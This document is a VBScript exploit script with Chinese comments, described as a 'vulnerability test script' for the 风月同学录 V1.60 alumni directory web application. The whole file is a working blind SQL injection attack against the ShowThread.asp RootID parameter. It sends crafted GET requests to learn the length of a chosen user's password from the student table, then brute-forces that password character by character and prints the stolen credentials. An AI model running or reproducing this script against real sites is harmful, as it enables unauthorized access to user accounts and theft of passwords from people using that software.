dim pwd,username,sql,i,strings,pwd_len,flag 
If WScript.Arguments.Count <>3 then
wscript.echo string(78,"*")
wscript.echo vbcrcrlflfcrlf
wscript.echo vbtab&"风月同学录V1.60漏洞测试脚本 code by 2b007"
wscript.echo "usage:cscript.exe "&WScript.ScriptFullName&" http://path username flag"
wscript.echo "path:一般为xxx.com/txl/ShowThread.asp?RootID=xxx"
wscript.echo "username: 你要破解的用户名"
wscript.echo "flag:正确页面的字符并且是e文的"
wscript.echo vbcrcrlflfcrlf
wscript.echo string(78,"*")
wscript.quit
end if
username=WScript.Arguments(1)
pwd = ""
 flag=WScript.Arguments(2) '正常页面的一个字符串 最好是e文的
'密码的字符范围
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
banner=string(65,"*")&vbcrlf&vbcrlf&vbtab&" 风月同学录V1.60漏洞测试脚本 code by "&_ 
"2b007"&vbcrlf&vbcrlf&string(65,"*")
wscript.echo banner
wscript.echo "cjecking pwdlen of " &username &" ……"
iRemote = LCase(WScript.Arguments(0))  
Set xPost = CreateObject("Microsoft.XMLHTTP")  
for i=1 to 128 step 1
sql=iRemote&"%20and%20exists%20(select%20userid%20from%20student%20where%20len(userpwd)='"&i&_
"'%20and%20userid='" & username & "')"
xPost.Open "GET",sql,0  
xPost.Send()
If instr(xPost.responseText, flag) <> 0 Then
pwd_len = "" & i & ""
Exit For
End If
Next  
wscript.echo "pwdlen="&pwd_len 
wscript.echo "checking password ……"  
For j = 1 to pwd_len step 1
For k = 1 to len(strings) step 1
sql = iRemote&"%20and%20exists%20(select%20userid%20from%20student%20where%20left(userpwd," & j & ")='" & pwd & mid(strings,k,1) & "'%20and%20userid='" & username & "')"
xPost.Open "GET",sql,0  
xPost.Send()
If instr(xPost.responseText, flag) <> 0 Then
pwd = pwd & mid(strings,k,1)
Exit For
End If 
Next
Next
If err Then
WScript.Echo "错误:" & Error.Description
Error.Clear
Else
'输出密码
wscript.echo "uesrname: " & username
WScript.Echo "password: " & pwd
End If
Set xPost= nothing